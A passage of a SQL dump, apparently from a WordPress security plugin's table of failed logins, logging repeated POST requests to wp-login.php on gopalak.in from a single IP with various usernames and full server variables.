05:44:25'),(95783,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51577\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747090379.2390079;s:12:\"REQUEST_TIME\";i:1747090379;}}','43.205.255.0',1,'2025-05-13 04:23:00','2025-05-14 05:44:25'),(95784,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51575\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747090379.238342;s:12:\"REQUEST_TIME\";i:1747090379;}}','43.205.255.0',1,'2025-05-13 04:23:00','2025-05-14 05:44:25'),(95785,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51580\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747090380.1422141;s:12:\"REQUEST_TIME\";i:1747090380;}}','43.205.255.0',1,'2025-05-13 04:23:01','2025-05-14 05:44:25'),(95786,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63206\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091065.061337;s:12:\"REQUEST_TIME\";i:1747091065;}}','43.205.255.0',1,'2025-05-13 04:34:27','2025-05-14 05:44:25'),(95787,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63204\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091065.062072;s:12:\"REQUEST_TIME\";i:1747091065;}}','43.205.255.0',1,'2025-05-13 04:34:27','2025-05-14 05:44:25'),(95788,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63203\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091066.7274189;s:12:\"REQUEST_TIME\";i:1747091066;}}','43.205.255.0',1,'2025-05-13 04:34:28','2025-05-14 05:44:25'),(95789,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63207\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091066.7281139;s:12:\"REQUEST_TIME\";i:1747091066;}}','43.205.255.0',1,'2025-05-13 04:34:28','2025-05-14 05:44:25'),(95790,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63208\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091067.6310489;s:12:\"REQUEST_TIME\";i:1747091067;}}','43.205.255.0',1,'2025-05-13 04:34:29','2025-05-14 05:44:25'),(95791,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"122\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58676\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"122\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091744.4748559;s:12:\"REQUEST_TIME\";i:1747091744;}}','43.205.255.0',1,'2025-05-13 04:45:47','2025-05-14 05:44:25'),(95792,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58681\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091744.4744079;s:12:\"REQUEST_TIME\";i:1747091744;}}','43.205.255.0',1,'2025-05-13 04:45:47','2025-05-14 05:44:25'),(95793,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58682\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091746.140218;s:12:\"REQUEST_TIME\";i:1747091746;}}','43.205.255.0',1,'2025-05-13 04:45:47','2025-05-14 05:44:25'),(95794,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58680\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747091746.1396201;s:12:\"REQUEST_TIME\";i:1747091746;}}','43.205.255.0',1,'2025-05-13 04:45:47','2025-05-14 